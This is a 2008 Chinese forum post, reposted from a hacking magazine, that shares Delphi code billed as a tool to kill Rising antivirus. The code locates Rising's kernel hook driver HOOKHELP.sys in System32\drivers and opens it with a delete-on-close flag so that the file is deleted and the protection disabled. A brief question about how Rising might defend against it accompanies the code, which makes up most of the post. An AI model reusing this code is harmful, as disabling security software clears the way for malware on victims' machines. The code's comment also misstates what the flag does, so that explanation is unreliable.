特邀体验者
- 帖子:357
- 注册:
2007-02-24
- 来自:
|
发表于:
2008-08-08 17:56
|
显示全部
短消息
资料
干掉瑞星的工具
据说可以kill RISING 版主给看看 瑞星是否能够如何防范 关键代码: function Deleterising:boolean; var Wdir : pChar; Stmp,RisHookPath:string; Hfile:THandle; begin result:=false; Getmem(wdir,255); GetSystemDirectory(Wdir, 255); //得到系统System32的目录 Stmp:=pchar(wdir); if (Stmp[length(Stmp)]<>'\') then Stmp:=Stmp+'\'; RisHookPath:=Stmp+'drivers\HOOKHELP.sys';//得到瑞星的底层HOOK驱动文件的路径 //showmessage(RisHookPath); Try Hfile:=CreateFile(PCHAR(RisHookPath),GENERIC_READ,FILE_SHARE_READ,nil,OPEN_EXISTING,FILE_FLAG_DELETE_ON_CLOSE,0);//其中FILE_FLAG_DELETE_ON_CLOSE参数的含义是系统重启后删除文件 closehandle(hfile); result:=true; except end; end;procedure TForm1.FormCreate(Sender: TObject); begin if Deleterising then begin showmessage('删除文件成功,请重启系统!');end;end; end.【转自黑防】
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; TheWorld)
附件:
您所在的用户组无法下载或查看附件
一见钟情,再而衰,三而竭。
|